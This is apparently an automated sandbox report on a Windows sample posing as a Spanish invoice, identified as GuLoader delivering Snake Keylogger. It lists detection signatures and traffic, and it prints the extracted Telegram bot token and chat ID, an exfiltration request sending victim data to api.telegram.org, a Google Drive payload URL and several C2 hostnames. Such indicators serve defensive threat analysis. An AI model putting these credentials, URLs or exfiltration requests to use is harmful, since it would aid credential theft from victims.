Windows Analysis Report
Factura Honorarios 2024-10.exe

Overview

General Information

Sample name: Factura Honorarios 2024-10.exe
Analysis ID: 1545394
MD5: 43a7d0b4c9aefb5dd8c1fbfad057b4b9
SHA1: abcfcabf7f909fc140e8e00bfaeea404e23fca76
SHA256: edf915e141af931f3bf0174a430576b7f7493449bdb1a4275515d0fe0a24fd8c
Tags: exevipkeyloggeruser-malwarelabnet

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}
Source: Factura Honorarios 2024-10.exe ReversingLabs: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ACC87A8 CryptUnprotectData, 4_2_3ACC87A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ACC8EF1 CryptUnprotectData, 4_2_3ACC8EF1
Source: Factura Honorarios 2024-10.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49846 version: TLS 1.0
Source: unknown HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2031/10/2024%20/%2001:29:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 132.226.8.169
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49859 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49835 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49877 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49802 -> 216.58.206.46:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49846 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 30 Oct 2024 13:19:41 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Factura Honorarios 2024-10.exe, 00000000.00000000.1732761508.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Factura Honorarios 2024-10.exe, 00000000.00000002.2288945169.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000000.2285548964.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20a
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037B60000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037B5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.0000000007498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.00000000074D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb
Source: Factura Honorarios 2024-10.exe, 00000004.00000003.2448957898.000000000750D000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.0000000007505000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: Factura Honorarios 2024-10.exe, 00000004.00000003.2448957898.000000000750D000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.0000000007505000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000003.2799657598.0000000007530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/Zc
Source: Factura Honorarios 2024-10.exe, 00000004.00000003.2448957898.000000000750D000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.00000000074D2000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.00000000074ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb&export=download
Source: Factura Honorarios 2024-10.exe, 00000004.00000003.2448957898.000000000750D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb&export=downloade1
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A83000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A83000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78$
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038AC3000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038D1C000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037AA7000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C19000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038A75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038A7C000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038A51000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C20000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038BF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038AC3000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038D1C000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037AA7000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C19000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038A75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038A7C000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038A51000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C20000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038BF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3013216101.0000000038C67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011994404.0000000037B8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00405160 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405160
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 0_2_004031FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 4_2_004031FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Windows\resources\0809 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3A4A0 4_2_3AD3A4A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3FAA0 4_2_3AD3FAA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3CFA7 4_2_3AD3CFA7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD32DA8 4_2_3AD32DA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3CFA8 4_2_3AD3CFA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3C150 4_2_3AD3C150
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3EC54 4_2_3AD3EC54
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3095B 4_2_3AD3095B
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD37E5B 4_2_3AD37E5B
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD33B58 4_2_3AD33B58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3EC58 4_2_3AD3EC58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD30040 4_2_3AD30040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD36B40 4_2_3AD36B40
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD35B44 4_2_3AD35B44
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD33B49 4_2_3AD33B49
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD35B48 4_2_3AD35B48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD39648 4_2_3AD39648
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3C14C 4_2_3AD3C14C
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD34471 4_2_3AD34471
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3D470 4_2_3AD3D470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD39177 4_2_3AD39177
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD31275 4_2_3AD31275
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD36675 4_2_3AD36675
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD34478 4_2_3AD34478
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3BC7F 4_2_3AD3BC7F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD30960 4_2_3AD30960
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD37E60 4_2_3AD37E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3A964 4_2_3AD3A964
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3D46D 4_2_3AD3D46D
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3F111 4_2_3AD3F111
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD31710 4_2_3AD31710
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD39B10 4_2_3AD39B10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD38319 4_2_3AD38319
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD32918 4_2_3AD32918
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3C618 4_2_3AD3C618
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3AE1F 4_2_3AD3AE1F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3DE00 4_2_3AD3DE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD37004 4_2_3AD37004
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD39B0B 4_2_3AD39B0B
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD36609 4_2_3AD36609
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3C609 4_2_3AD3C609
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD34908 4_2_3AD34908
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD37008 4_2_3AD37008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD32908 4_2_3AD32908
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3170C 4_2_3AD3170C
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3AE30 4_2_3AD3AE30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD39637 4_2_3AD39637
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD33235 4_2_3AD33235
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3D934 4_2_3AD3D934
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD33238 4_2_3AD33238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3D938 4_2_3AD3D938
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD30038 4_2_3AD30038
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD36B38 4_2_3AD36B38
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD35223 4_2_3AD35223
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD3F120 4_2_3AD3F120
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD35228 4_2_3AD35228
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD38328 4_2_3AD38328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD670C0 4_2_3AD670C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD6D710 4_2_3AD6D710
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD63EC0 4_2_3AD63EC0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60CC0 4_2_3AD60CC0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD65AE0 4_2_3AD65AE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD628E0 4_2_3AD628E0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD63880 4_2_3AD63880
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60680 4_2_3AD60680
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD66A80 4_2_3AD66A80
